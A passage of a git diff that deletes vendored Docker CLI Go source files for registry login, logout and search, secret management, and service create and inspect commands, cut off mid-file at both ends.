Networks -func NewNetworkPruneCommand(dockerCli *command.DockerCli) *cobra.Command { - return network.NewPruneCommand(dockerCli) -} - -// RunContainerPrune executes a prune command for containers -func RunContainerPrune(dockerCli *command.DockerCli) (uint64, string, error) { - return container.RunPrune(dockerCli) -} - -// RunVolumePrune executes a prune command for volumes -func RunVolumePrune(dockerCli *command.DockerCli) (uint64, string, error) { - return volume.RunPrune(dockerCli) -} - -// RunImagePrune executes a prune command for images -func RunImagePrune(dockerCli *command.DockerCli, all bool) (uint64, string, error) { - return image.RunPrune(dockerCli, all) -} - -// RunNetworkPrune executes a prune command for networks -func RunNetworkPrune(dockerCli *command.DockerCli) (uint64, string, error) { - return network.RunPrune(dockerCli) -} diff --git a/vendor/github.com/docker/docker/cli/command/registry.go b/vendor/github.com/docker/docker/cli/command/registry.go deleted file mode 100644 index 65f6b3309e..0000000000 --- a/vendor/github.com/docker/docker/cli/command/registry.go +++ /dev/null @@ -1,186 +0,0 @@ -package command - -import ( - "bufio" - "encoding/base64" - "encoding/json" - "fmt" - "io" - "os" - "runtime" - "strings" - - "golang.org/x/net/context" - - "github.com/docker/docker/api/types" - registrytypes "github.com/docker/docker/api/types/registry" - "github.com/docker/docker/pkg/term" - "github.com/docker/docker/reference" - "github.com/docker/docker/registry" -) - -// ElectAuthServer returns the default registry to use (by asking the daemon) -func ElectAuthServer(ctx context.Context, cli *DockerCli) string { - // The daemon `/info` endpoint informs us of the default registry being - // used. This is essential in cross-platforms environment, where for - // example a Linux client might be interacting with a Windows daemon, hence - // the default registry URL might be Windows specific. - serverAddress := registry.IndexServer - if info, err := cli.Client().Info(ctx); err != nil { - fmt.Fprintf(cli.Out(), "Warning: failed to get default registry endpoint from daemon (%v). Using system default: %s\n", err, serverAddress) - } else { - serverAddress = info.IndexServerAddress - } - return serverAddress -} - -// EncodeAuthToBase64 serializes the auth configuration as JSON base64 payload -func EncodeAuthToBase64(authConfig types.AuthConfig) (string, error) { - buf, err := json.Marshal(authConfig) - if err != nil { - return "", err - } - return base64.URLEncoding.EncodeToString(buf), nil -} - -// RegistryAuthenticationPrivilegedFunc returns a RequestPrivilegeFunc from the specified registry index info -// for the given command. -func RegistryAuthenticationPrivilegedFunc(cli *DockerCli, index *registrytypes.IndexInfo, cmdName string) types.RequestPrivilegeFunc { - return func() (string, error) { - fmt.Fprintf(cli.Out(), "\nPlease login prior to %s:\n", cmdName) - indexServer := registry.GetAuthConfigKey(index) - isDefaultRegistry := indexServer == ElectAuthServer(context.Background(), cli) - authConfig, err := ConfigureAuth(cli, "", "", indexServer, isDefaultRegistry) - if err != nil { - return "", err - } - return EncodeAuthToBase64(authConfig) - } -} - -// ResolveAuthConfig is like registry.ResolveAuthConfig, but if using the -// default index, it uses the default index name for the daemon's platform, -// not the client's platform. -func ResolveAuthConfig(ctx context.Context, cli *DockerCli, index *registrytypes.IndexInfo) types.AuthConfig { - configKey := index.Name - if index.Official { - configKey = ElectAuthServer(ctx, cli) - } - - a, _ := cli.CredentialsStore(configKey).Get(configKey) - return a -} - -// ConfigureAuth returns an AuthConfig from the specified user, password and server. -func ConfigureAuth(cli *DockerCli, flUser, flPassword, serverAddress string, isDefaultRegistry bool) (types.AuthConfig, error) { - // On Windows, force the use of the regular OS stdin stream. Fixes #14336/#14210 - if runtime.GOOS == "windows" { - cli.in = NewInStream(os.Stdin) - } - - if !isDefaultRegistry { - serverAddress = registry.ConvertToHostname(serverAddress) - } - - authconfig, err := cli.CredentialsStore(serverAddress).Get(serverAddress) - if err != nil { - return authconfig, err - } - - // Some links documenting this: - // - https://code.google.com/archive/p/mintty/issues/56 - // - https://github.com/docker/docker/issues/15272 - // - https://mintty.github.io/ (compatibility) - // Linux will hit this if you attempt `cat | docker login`, and Windows - // will hit this if you attempt docker login from mintty where stdin - // is a pipe, not a character based console. - if flPassword == "" && !cli.In().IsTerminal() { - return authconfig, fmt.Errorf("Error: Cannot perform an interactive login from a non TTY device") - } - - authconfig.Username = strings.TrimSpace(authconfig.Username) - - if flUser = strings.TrimSpace(flUser); flUser == "" { - if isDefaultRegistry { - // if this is a default registry (docker hub), then display the following message. - fmt.Fprintln(cli.Out(), "Login with your Docker ID to push and pull images from Docker Hub. If you don't have a Docker ID, head over to https://hub.docker.com to create one.") - } - promptWithDefault(cli.Out(), "Username", authconfig.Username) - flUser = readInput(cli.In(), cli.Out()) - flUser = strings.TrimSpace(flUser) - if flUser == "" { - flUser = authconfig.Username - } - } - if flUser == "" { - return authconfig, fmt.Errorf("Error: Non-null Username Required") - } - if flPassword == "" { - oldState, err := term.SaveState(cli.In().FD()) - if err != nil { - return authconfig, err - } - fmt.Fprintf(cli.Out(), "Password: ") - term.DisableEcho(cli.In().FD(), oldState) - - flPassword = readInput(cli.In(), cli.Out()) - fmt.Fprint(cli.Out(), "\n") - - term.RestoreTerminal(cli.In().FD(), oldState) - if flPassword == "" { - return authconfig, fmt.Errorf("Error: Password Required") - } - } - - authconfig.Username = flUser - authconfig.Password = flPassword - authconfig.ServerAddress = serverAddress - authconfig.IdentityToken = "" - - return authconfig, nil -} - -func readInput(in io.Reader, out io.Writer) string { - reader := bufio.NewReader(in) - line, _, err := reader.ReadLine() - if err != nil { - fmt.Fprintln(out, err.Error()) - os.Exit(1) - } - return string(line) -} - -func promptWithDefault(out io.Writer, prompt string, configDefault string) { - if configDefault == "" { - fmt.Fprintf(out, "%s: ", prompt) - } else { - fmt.Fprintf(out, "%s (%s): ", prompt, configDefault) - } -} - -// RetrieveAuthTokenFromImage retrieves an encoded auth token given a complete image -func RetrieveAuthTokenFromImage(ctx context.Context, cli *DockerCli, image string) (string, error) { - // Retrieve encoded auth token from the image reference - authConfig, err := resolveAuthConfigFromImage(ctx, cli, image) - if err != nil { - return "", err - } - encodedAuth, err := EncodeAuthToBase64(authConfig) - if err != nil { - return "", err - } - return encodedAuth, nil -} - -// resolveAuthConfigFromImage retrieves that AuthConfig using the image string -func resolveAuthConfigFromImage(ctx context.Context, cli *DockerCli, image string) (types.AuthConfig, error) { - registryRef, err := reference.ParseNamed(image) - if err != nil { - return types.AuthConfig{}, err - } - repoInfo, err := registry.ParseRepositoryInfo(registryRef) - if err != nil { - return types.AuthConfig{}, err - } - return ResolveAuthConfig(ctx, cli, repoInfo.Index), nil -} diff --git a/vendor/github.com/docker/docker/cli/command/registry/login.go b/vendor/github.com/docker/docker/cli/command/registry/login.go deleted file mode 100644 index 05b3bb03b2..0000000000 --- a/vendor/github.com/docker/docker/cli/command/registry/login.go +++ /dev/null @@ -1,85 +0,0 @@ -package registry - -import ( - "fmt" - - "golang.org/x/net/context" - - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/spf13/cobra" -) - -type loginOptions struct { - serverAddress string - user string - password string - email string -} - -// NewLoginCommand creates a new `docker login` command -func NewLoginCommand(dockerCli *command.DockerCli) *cobra.Command { - var opts loginOptions - - cmd := &cobra.Command{ - Use: "login [OPTIONS] [SERVER]", - Short: "Log in to a Docker registry", - Long: "Log in to a Docker registry.\nIf no server is specified, the default is defined by the daemon.", - Args: cli.RequiresMaxArgs(1), - RunE: func(cmd *cobra.Command, args []string) error { - if len(args) > 0 { - opts.serverAddress = args[0] - } - return runLogin(dockerCli, opts) - }, - } - - flags := cmd.Flags() - - flags.StringVarP(&opts.user, "username", "u", "", "Username") - flags.StringVarP(&opts.password, "password", "p", "", "Password") - - // Deprecated in 1.11: Should be removed in docker 1.14 - flags.StringVarP(&opts.email, "email", "e", "", "Email") - flags.MarkDeprecated("email", "will be removed in 1.14.") - - return cmd -} - -func runLogin(dockerCli *command.DockerCli, opts loginOptions) error { - ctx := context.Background() - clnt := dockerCli.Client() - - var ( - serverAddress string - authServer = command.ElectAuthServer(ctx, dockerCli) - ) - if opts.serverAddress != "" { - serverAddress = opts.serverAddress - } else { - serverAddress = authServer - } - - isDefaultRegistry := serverAddress == authServer - - authConfig, err := command.ConfigureAuth(dockerCli, opts.user, opts.password, serverAddress, isDefaultRegistry) - if err != nil { - return err - } - response, err := clnt.RegistryLogin(ctx, authConfig) - if err != nil { - return err - } - if response.IdentityToken != "" { - authConfig.Password = "" - authConfig.IdentityToken = response.IdentityToken - } - if err := dockerCli.CredentialsStore(serverAddress).Store(authConfig); err != nil { - return fmt.Errorf("Error saving credentials: %v", err) - } - - if response.Status != "" { - fmt.Fprintln(dockerCli.Out(), response.Status) - } - return nil -} diff --git a/vendor/github.com/docker/docker/cli/command/registry/logout.go b/vendor/github.com/docker/docker/cli/command/registry/logout.go deleted file mode 100644 index 877e60e8cc..0000000000 --- a/vendor/github.com/docker/docker/cli/command/registry/logout.go +++ /dev/null @@ -1,77 +0,0 @@ -package registry - -import ( - "fmt" - - "golang.org/x/net/context" - - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/docker/docker/registry" - "github.com/spf13/cobra" -) - -// NewLogoutCommand creates a new `docker login` command -func NewLogoutCommand(dockerCli *command.DockerCli) *cobra.Command { - cmd := &cobra.Command{ - Use: "logout [SERVER]", - Short: "Log out from a Docker registry", - Long: "Log out from a Docker registry.\nIf no server is specified, the default is defined by the daemon.", - Args: cli.RequiresMaxArgs(1), - RunE: func(cmd *cobra.Command, args []string) error { - var serverAddress string - if len(args) > 0 { - serverAddress = args[0] - } - return runLogout(dockerCli, serverAddress) - }, - } - - return cmd -} - -func runLogout(dockerCli *command.DockerCli, serverAddress string) error { - ctx := context.Background() - var isDefaultRegistry bool - - if serverAddress == "" { - serverAddress = command.ElectAuthServer(ctx, dockerCli) - isDefaultRegistry = true - } - - var ( - loggedIn bool - regsToLogout []string - hostnameAddress = serverAddress - regsToTry = []string{serverAddress} - ) - if !isDefaultRegistry { - hostnameAddress = registry.ConvertToHostname(serverAddress) - // the tries below are kept for backward compatibility where a user could have - // saved the registry in one of the following format. - regsToTry = append(regsToTry, hostnameAddress, "http://"+hostnameAddress, "https://"+hostnameAddress) - } - - // check if we're logged in based on the records in the config file - // which means it couldn't have user/pass cause they may be in the creds store - for _, s := range regsToTry { - if _, ok := dockerCli.ConfigFile().AuthConfigs[s]; ok { - loggedIn = true - regsToLogout = append(regsToLogout, s) - } - } - - if !loggedIn { - fmt.Fprintf(dockerCli.Out(), "Not logged in to %s\n", hostnameAddress) - return nil - } - - fmt.Fprintf(dockerCli.Out(), "Removing login credentials for %s\n", hostnameAddress) - for _, r := range regsToLogout { - if err := dockerCli.CredentialsStore(r).Erase(r); err != nil { - fmt.Fprintf(dockerCli.Err(), "WARNING: could not erase credentials: %v\n", err) - } - } - - return nil -} diff --git a/vendor/github.com/docker/docker/cli/command/registry/search.go b/vendor/github.com/docker/docker/cli/command/registry/search.go deleted file mode 100644 index 124b4ae6cc..0000000000 --- a/vendor/github.com/docker/docker/cli/command/registry/search.go +++ /dev/null @@ -1,126 +0,0 @@ -package registry - -import ( - "fmt" - "sort" - "strings" - "text/tabwriter" - - "golang.org/x/net/context" - - "github.com/docker/docker/api/types" - registrytypes "github.com/docker/docker/api/types/registry" - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/docker/docker/opts" - "github.com/docker/docker/pkg/stringutils" - "github.com/docker/docker/registry" - "github.com/spf13/cobra" -) - -type searchOptions struct { - term string - noTrunc bool - limit int - filter opts.FilterOpt - - // Deprecated - stars uint - automated bool -} - -// NewSearchCommand creates a new `docker search` command -func NewSearchCommand(dockerCli *command.DockerCli) *cobra.Command { - opts := searchOptions{filter: opts.NewFilterOpt()} - - cmd := &cobra.Command{ - Use: "search [OPTIONS] TERM", - Short: "Search the Docker Hub for images", - Args: cli.ExactArgs(1), - RunE: func(cmd *cobra.Command, args []string) error { - opts.term = args[0] - return runSearch(dockerCli, opts) - }, - } - - flags := cmd.Flags() - - flags.BoolVar(&opts.noTrunc, "no-trunc", false, "Don't truncate output") - flags.VarP(&opts.filter, "filter", "f", "Filter output based on conditions provided") - flags.IntVar(&opts.limit, "limit", registry.DefaultSearchLimit, "Max number of search results") - - flags.BoolVar(&opts.automated, "automated", false, "Only show automated builds") - flags.UintVarP(&opts.stars, "stars", "s", 0, "Only displays with at least x stars") - - flags.MarkDeprecated("automated", "use --filter=automated=true instead") - flags.MarkDeprecated("stars", "use --filter=stars=3 instead") - - return cmd -} - -func runSearch(dockerCli *command.DockerCli, opts searchOptions) error { - indexInfo, err := registry.ParseSearchIndexInfo(opts.term) - if err != nil { - return err - } - - ctx := context.Background() - - authConfig := command.ResolveAuthConfig(ctx, dockerCli, indexInfo) - requestPrivilege := command.RegistryAuthenticationPrivilegedFunc(dockerCli, indexInfo, "search") - - encodedAuth, err := command.EncodeAuthToBase64(authConfig) - if err != nil { - return err - } - - options := types.ImageSearchOptions{ - RegistryAuth: encodedAuth, - PrivilegeFunc: requestPrivilege, - Filters: opts.filter.Value(), - Limit: opts.limit, - } - - clnt := dockerCli.Client() - - unorderedResults, err := clnt.ImageSearch(ctx, opts.term, options) - if err != nil { - return err - } - - results := searchResultsByStars(unorderedResults) - sort.Sort(results) - - w := tabwriter.NewWriter(dockerCli.Out(), 10, 1, 3, ' ', 0) - fmt.Fprintf(w, "NAME\tDESCRIPTION\tSTARS\tOFFICIAL\tAUTOMATED\n") - for _, res := range results { - // --automated and -s, --stars are deprecated since Docker 1.12 - if (opts.automated && !res.IsAutomated) || (int(opts.stars) > res.StarCount) { - continue - } - desc := strings.Replace(res.Description, "\n", " ", -1) - desc = strings.Replace(desc, "\r", " ", -1) - if !opts.noTrunc { - desc = stringutils.Ellipsis(desc, 45) - } - fmt.Fprintf(w, "%s\t%s\t%d\t", res.Name, desc, res.StarCount) - if res.IsOfficial { - fmt.Fprint(w, "[OK]") - - } - fmt.Fprint(w, "\t") - if res.IsAutomated { - fmt.Fprint(w, "[OK]") - } - fmt.Fprint(w, "\n") - } - w.Flush() - return nil -} - -// SearchResultsByStars sorts search results in descending order by number of stars. -type searchResultsByStars []registrytypes.SearchResult - -func (r searchResultsByStars) Len() int { return len(r) } -func (r searchResultsByStars) Swap(i, j int) { r[i], r[j] = r[j], r[i] } -func (r searchResultsByStars) Less(i, j int) bool { return r[j].StarCount < r[i].StarCount } diff --git a/vendor/github.com/docker/docker/cli/command/secret/cmd.go b/vendor/github.com/docker/docker/cli/command/secret/cmd.go deleted file mode 100644 index 79e669858c..0000000000 --- a/vendor/github.com/docker/docker/cli/command/secret/cmd.go +++ /dev/null @@ -1,25 +0,0 @@ -package secret - -import ( - "github.com/spf13/cobra" - - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" -) - -// NewSecretCommand returns a cobra command for `secret` subcommands -func NewSecretCommand(dockerCli *command.DockerCli) *cobra.Command { - cmd := &cobra.Command{ - Use: "secret", - Short: "Manage Docker secrets", - Args: cli.NoArgs, - RunE: dockerCli.ShowHelp, - } - cmd.AddCommand( - newSecretListCommand(dockerCli), - newSecretCreateCommand(dockerCli), - newSecretInspectCommand(dockerCli), - newSecretRemoveCommand(dockerCli), - ) - return cmd -} diff --git a/vendor/github.com/docker/docker/cli/command/secret/create.go b/vendor/github.com/docker/docker/cli/command/secret/create.go deleted file mode 100644 index f4683a60f5..0000000000 --- a/vendor/github.com/docker/docker/cli/command/secret/create.go +++ /dev/null @@ -1,79 +0,0 @@ -package secret - -import ( - "fmt" - "io" - "io/ioutil" - - "github.com/docker/docker/api/types/swarm" - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/docker/docker/opts" - "github.com/docker/docker/pkg/system" - runconfigopts "github.com/docker/docker/runconfig/opts" - "github.com/spf13/cobra" - "golang.org/x/net/context" -) - -type createOptions struct { - name string - file string - labels opts.ListOpts -} - -func newSecretCreateCommand(dockerCli *command.DockerCli) *cobra.Command { - createOpts := createOptions{ - labels: opts.NewListOpts(runconfigopts.ValidateEnv), - } - - cmd := &cobra.Command{ - Use: "create [OPTIONS] SECRET file|-", - Short: "Create a secret from a file or STDIN as content", - Args: cli.ExactArgs(2), - RunE: func(cmd *cobra.Command, args []string) error { - createOpts.name = args[0] - createOpts.file = args[1] - return runSecretCreate(dockerCli, createOpts) - }, - } - flags := cmd.Flags() - flags.VarP(&createOpts.labels, "label", "l", "Secret labels") - - return cmd -} - -func runSecretCreate(dockerCli *command.DockerCli, options createOptions) error { - client := dockerCli.Client() - ctx := context.Background() - - var in io.Reader = dockerCli.In() - if options.file != "-" { - file, err := system.OpenSequential(options.file) - if err != nil { - return err - } - in = file - defer file.Close() - } - - secretData, err := ioutil.ReadAll(in) - if err != nil { - return fmt.Errorf("Error reading content from %q: %v", options.file, err) - } - - spec := swarm.SecretSpec{ - Annotations: swarm.Annotations{ - Name: options.name, - Labels: runconfigopts.ConvertKVStringsToMap(options.labels.GetAll()), - }, - Data: secretData, - } - - r, err := client.SecretCreate(ctx, spec) - if err != nil { - return err - } - - fmt.Fprintln(dockerCli.Out(), r.ID) - return nil -} diff --git a/vendor/github.com/docker/docker/cli/command/secret/inspect.go b/vendor/github.com/docker/docker/cli/command/secret/inspect.go deleted file mode 100644 index 0a8bd4a23f..0000000000 --- a/vendor/github.com/docker/docker/cli/command/secret/inspect.go +++ /dev/null @@ -1,45 +0,0 @@ -package secret - -import ( - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/docker/docker/cli/command/inspect" - "github.com/spf13/cobra" - "golang.org/x/net/context" -) - -type inspectOptions struct { - names []string - format string -} - -func newSecretInspectCommand(dockerCli *command.DockerCli) *cobra.Command { - opts := inspectOptions{} - cmd := &cobra.Command{ - Use: "inspect [OPTIONS] SECRET [SECRET...]", - Short: "Display detailed information on one or more secrets", - Args: cli.RequiresMinArgs(1), - RunE: func(cmd *cobra.Command, args []string) error { - opts.names = args - return runSecretInspect(dockerCli, opts) - }, - } - - cmd.Flags().StringVarP(&opts.format, "format", "f", "", "Format the output using the given Go template") - return cmd -} - -func runSecretInspect(dockerCli *command.DockerCli, opts inspectOptions) error { - client := dockerCli.Client() - ctx := context.Background() - - ids, err := getCliRequestedSecretIDs(ctx, client, opts.names) - if err != nil { - return err - } - getRef := func(id string) (interface{}, []byte, error) { - return client.SecretInspectWithRaw(ctx, id) - } - - return inspect.Inspect(dockerCli.Out(), ids, opts.format, getRef) -} diff --git a/vendor/github.com/docker/docker/cli/command/secret/ls.go b/vendor/github.com/docker/docker/cli/command/secret/ls.go deleted file mode 100644 index faeab314b7..0000000000 --- a/vendor/github.com/docker/docker/cli/command/secret/ls.go +++ /dev/null @@ -1,68 +0,0 @@ -package secret - -import ( - "fmt" - "text/tabwriter" - "time" - - "github.com/docker/docker/api/types" - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/docker/go-units" - "github.com/spf13/cobra" - "golang.org/x/net/context" -) - -type listOptions struct { - quiet bool -} - -func newSecretListCommand(dockerCli *command.DockerCli) *cobra.Command { - opts := listOptions{} - - cmd := &cobra.Command{ - Use: "ls [OPTIONS]", - Aliases: []string{"list"}, - Short: "List secrets", - Args: cli.NoArgs, - RunE: func(cmd *cobra.Command, args []string) error { - return runSecretList(dockerCli, opts) - }, - } - - flags := cmd.Flags() - flags.BoolVarP(&opts.quiet, "quiet", "q", false, "Only display IDs") - - return cmd -} - -func runSecretList(dockerCli *command.DockerCli, opts listOptions) error { - client := dockerCli.Client() - ctx := context.Background() - - secrets, err := client.SecretList(ctx, types.SecretListOptions{}) - if err != nil { - return err - } - - w := tabwriter.NewWriter(dockerCli.Out(), 20, 1, 3, ' ', 0) - if opts.quiet { - for _, s := range secrets { - fmt.Fprintf(w, "%s\n", s.ID) - } - } else { - fmt.Fprintf(w, "ID\tNAME\tCREATED\tUPDATED") - fmt.Fprintf(w, "\n") - - for _, s := range secrets { - created := units.HumanDuration(time.Now().UTC().Sub(s.Meta.CreatedAt)) + " ago" - updated := units.HumanDuration(time.Now().UTC().Sub(s.Meta.UpdatedAt)) + " ago" - - fmt.Fprintf(w, "%s\t%s\t%s\t%s\n", s.ID, s.Spec.Annotations.Name, created, updated) - } - } - - w.Flush() - - return nil -} diff --git a/vendor/github.com/docker/docker/cli/command/secret/remove.go b/vendor/github.com/docker/docker/cli/command/secret/remove.go deleted file mode 100644 index f45a619f6a..0000000000 --- a/vendor/github.com/docker/docker/cli/command/secret/remove.go +++ /dev/null @@ -1,57 +0,0 @@ -package secret - -import ( - "fmt" - "strings" - - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/spf13/cobra" - "golang.org/x/net/context" -) - -type removeOptions struct { - names []string -} - -func newSecretRemoveCommand(dockerCli *command.DockerCli) *cobra.Command { - return &cobra.Command{ - Use: "rm SECRET [SECRET...]", - Aliases: []string{"remove"}, - Short: "Remove one or more secrets", - Args: cli.RequiresMinArgs(1), - RunE: func(cmd *cobra.Command, args []string) error { - opts := removeOptions{ - names: args, - } - return runSecretRemove(dockerCli, opts) - }, - } -} - -func runSecretRemove(dockerCli *command.DockerCli, opts removeOptions) error { - client := dockerCli.Client() - ctx := context.Background() - - ids, err := getCliRequestedSecretIDs(ctx, client, opts.names) - if err != nil { - return err - } - - var errs []string - - for _, id := range ids { - if err := client.SecretRemove(ctx, id); err != nil { - errs = append(errs, err.Error()) - continue - } - - fmt.Fprintln(dockerCli.Out(), id) - } - - if len(errs) > 0 { - return fmt.Errorf("%s", strings.Join(errs, "\n")) - } - - return nil -} diff --git a/vendor/github.com/docker/docker/cli/command/secret/utils.go b/vendor/github.com/docker/docker/cli/command/secret/utils.go deleted file mode 100644 index 11d31ffd16..0000000000 --- a/vendor/github.com/docker/docker/cli/command/secret/utils.go +++ /dev/null @@ -1,76 +0,0 @@ -package secret - -import ( - "fmt" - "strings" - - "github.com/docker/docker/api/types" - "github.com/docker/docker/api/types/filters" - "github.com/docker/docker/api/types/swarm" - "github.com/docker/docker/client" - "golang.org/x/net/context" -) - -// GetSecretsByNameOrIDPrefixes returns secrets given a list of ids or names -func GetSecretsByNameOrIDPrefixes(ctx context.Context, client client.APIClient, terms []string) ([]swarm.Secret, error) { - args := filters.NewArgs() - for _, n := range terms { - args.Add("names", n) - args.Add("id", n) - } - - return client.SecretList(ctx, types.SecretListOptions{ - Filters: args, - }) -} - -func getCliRequestedSecretIDs(ctx context.Context, client client.APIClient, terms []string) ([]string, error) { - secrets, err := GetSecretsByNameOrIDPrefixes(ctx, client, terms) - if err != nil { - return nil, err - } - - if len(secrets) > 0 { - found := make(map[string]struct{}) - next: - for _, term := range terms { - // attempt to lookup secret by full ID - for _, s := range secrets { - if s.ID == term { - found[s.ID] = struct{}{} - continue next - } - } - // attempt to lookup secret by full name - for _, s := range secrets { - if s.Spec.Annotations.Name == term { - found[s.ID] = struct{}{} - continue next - } - } - // attempt to lookup secret by partial ID (prefix) - // return error if more than one matches found (ambiguous) - n := 0 - for _, s := range secrets { - if strings.HasPrefix(s.ID, term) { - found[s.ID] = struct{}{} - n++ - } - } - if n > 1 { - return nil, fmt.Errorf("secret %s is ambiguous (%d matches found)", term, n) - } - } - - // We already collected all the IDs found. - // Now we will remove duplicates by converting the map to slice - ids := []string{} - for id := range found { - ids = append(ids, id) - } - - return ids, nil - } - - return terms, nil -} diff --git a/vendor/github.com/docker/docker/cli/command/service/cmd.go b/vendor/github.com/docker/docker/cli/command/service/cmd.go deleted file mode 100644 index 796fe926c3..0000000000 --- a/vendor/github.com/docker/docker/cli/command/service/cmd.go +++ /dev/null @@ -1,29 +0,0 @@ -package service - -import ( - "github.com/spf13/cobra" - - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" -) - -// NewServiceCommand returns a cobra command for `service` subcommands -func NewServiceCommand(dockerCli *command.DockerCli) *cobra.Command { - cmd := &cobra.Command{ - Use: "service", - Short: "Manage services", - Args: cli.NoArgs, - RunE: dockerCli.ShowHelp, - } - cmd.AddCommand( - newCreateCommand(dockerCli), - newInspectCommand(dockerCli), - newPsCommand(dockerCli), - newListCommand(dockerCli), - newRemoveCommand(dockerCli), - newScaleCommand(dockerCli), - newUpdateCommand(dockerCli), - newLogsCommand(dockerCli), - ) - return cmd -} diff --git a/vendor/github.com/docker/docker/cli/command/service/create.go b/vendor/github.com/docker/docker/cli/command/service/create.go deleted file mode 100644 index 1355c19c65..0000000000 --- a/vendor/github.com/docker/docker/cli/command/service/create.go +++ /dev/null @@ -1,100 +0,0 @@ -package service - -import ( - "fmt" - - "github.com/docker/docker/api/types" - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/spf13/cobra" - "golang.org/x/net/context" -) - -func newCreateCommand(dockerCli *command.DockerCli) *cobra.Command { - opts := newServiceOptions() - - cmd := &cobra.Command{ - Use: "create [OPTIONS] IMAGE [COMMAND] [ARG...]", - Short: "Create a new service", - Args: cli.RequiresMinArgs(1), - RunE: func(cmd *cobra.Command, args []string) error { - opts.image = args[0] - if len(args) > 1 { - opts.args = args[1:] - } - return runCreate(dockerCli, opts) - }, - } - flags := cmd.Flags() - flags.StringVar(&opts.mode, flagMode, "replicated", "Service mode (replicated or global)") - flags.StringVar(&opts.name, flagName, "", "Service name") - - addServiceFlags(cmd, opts) - - flags.VarP(&opts.labels, flagLabel, "l", "Service labels") - flags.Var(&opts.containerLabels, flagContainerLabel, "Container labels") - flags.VarP(&opts.env, flagEnv, "e", "Set environment variables") - flags.Var(&opts.envFile, flagEnvFile, "Read in a file of environment variables") - flags.Var(&opts.mounts, flagMount, "Attach a filesystem mount to the service") - flags.Var(&opts.constraints, flagConstraint, "Placement constraints") - flags.Var(&opts.networks, flagNetwork, "Network attachments") - flags.Var(&opts.secrets, flagSecret, "Specify secrets to expose to the service") - flags.VarP(&opts.endpoint.publishPorts, flagPublish, "p", "Publish a port as a node port") - flags.Var(&opts.groups, flagGroup, "Set one or more supplementary user groups for the container") - flags.Var(&opts.dns, flagDNS, "Set custom DNS servers") - flags.Var(&opts.dnsOption, flagDNSOption, "Set DNS options") - flags.Var(&opts.dnsSearch, flagDNSSearch, "Set custom DNS search domains") - flags.Var(&opts.hosts, flagHost, "Set one or more custom host-to-IP mappings (host:ip)") - - flags.SetInterspersed(false) - return cmd -} - -func runCreate(dockerCli *command.DockerCli, opts *serviceOptions) error { - apiClient := dockerCli.Client() - createOpts := types.ServiceCreateOptions{} - - service, err := opts.ToService() - if err != nil { - return err - } - - specifiedSecrets := opts.secrets.Value() - if len(specifiedSecrets) > 0 { - // parse and validate secrets - secrets, err := ParseSecrets(apiClient, specifiedSecrets) - if err != nil { - return err - } - service.TaskTemplate.ContainerSpec.Secrets = secrets - - } - - ctx := context.Background() - - if err := resolveServiceImageDigest(dockerCli, &service); err != nil { - return err - } - - // only send auth if flag was set - if opts.registryAuth { - // Retrieve encoded auth token from the image reference - encodedAuth, err := command.RetrieveAuthTokenFromImage(ctx, dockerCli, opts.image) - if err != nil { - return err - } - createOpts.EncodedRegistryAuth = encodedAuth - } - - response, err := apiClient.ServiceCreate(ctx, service, createOpts) - if err != nil { - return err - } - - for _, warning := range response.Warnings { - fmt.Fprintln(dockerCli.Err(), warning) - } - - fmt.Fprintf(dockerCli.Out(), "%s\n", response.ID) - return nil -} diff --git a/vendor/github.com/docker/docker/cli/command/service/inspect.go b/vendor/github.com/docker/docker/cli/command/service/inspect.go deleted file mode 100644 index deb701bf6d..0000000000 --- a/vendor/github.com/docker/docker/cli/command/service/inspect.go +++ /dev/null @@ -1,84 +0,0 @@ -package service - -import ( - "fmt" - "strings" - - "golang.org/x/net/context" - - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/docker/docker/cli/command/formatter" - apiclient "github.com/docker/docker/client" - "github.com/spf13/cobra" -) - -type inspectOptions struct { - refs []string - format string - pretty bool -} - -func newInspectCommand(dockerCli *command.DockerCli) *cobra.Command { - var opts inspectOptions - - cmd := &cobra.Command{ - Use: "inspect [OPTIONS] SERVICE [SERVICE...]", - Short: "Display detailed information on one or more services", - Args: cli.RequiresMinArgs(1), - RunE: func(cmd *cobra.Command, args []string) error { - opts.refs = args - - if opts.pretty && len(opts.format) > 0 { - return fmt.Errorf("--format is incompatible with human friendly format") - } - return runInspect(dockerCli, opts) - }, - } - - flags := cmd.Flags() - flags.StringVarP(&opts.format, "format", "f", "", "Format the output using the given Go template") - flags.BoolVar(&opts.pretty, "pretty", false, "Print the information in a human friendly format.") - return cmd -} - -func runInspect(dockerCli *command.DockerCli, opts inspectOptions) error { - client := dockerCli.Client() - ctx := context.Background() - - if opts.pretty { - opts.format = "pretty" - } - - getRef := func(ref string) (interface{}, []byte, error) { - service, _, err := client.ServiceInspectWithRaw(ctx, ref) - if err == nil || !apiclient.IsErrServiceNotFound(err) { - return service, nil, err - } - return nil, nil, fmt.Errorf("Error: no such service: %s", ref) - } - - f := opts.format - if len(f) == 0 { - f = "raw" - if len(dockerCli.ConfigFile().ServiceInspectFormat) > 0 { - f = dockerCli.ConfigFile().ServiceInspectFormat - } - } - - // check if the user is trying to apply a template to the pretty format, which - // is not supported - if strings.HasPrefix(f, "pretty") && f != "pretty" { - return fmt.Errorf("Cannot supply extra formatting options to the pretty template") - } - - serviceCtx := formatter.Context{ - Output: dockerCli.Out(), - Format: formatter.NewServiceFormat(f), - } - - if err := formatter.ServiceInspectWrite(serviceCtx, opts.refs, getRef); err != nil { - return cli.StatusError{StatusCode: 1, Status: err.Error()} - } - return nil -} diff --git a/vendor/github.com/docker/docker/cli/command/service/inspect_test.go b/vendor/github.com/docker/docker/cli/command/service/inspect_test.go deleted file mode 100644 index 04a65080c7..0000000000 --- a/vendor/github.com/docker/docker/cli/command/service/inspect_test.go +++ /dev/null @@ -1,129 +0,0 @@ -package service - -import ( - "bytes" - "encoding/json" - "strings" - "testing" - "time" - - "github.com/docker/docker/api/types/swarm" - "github.com/docker/docker/cli/command/formatter" - 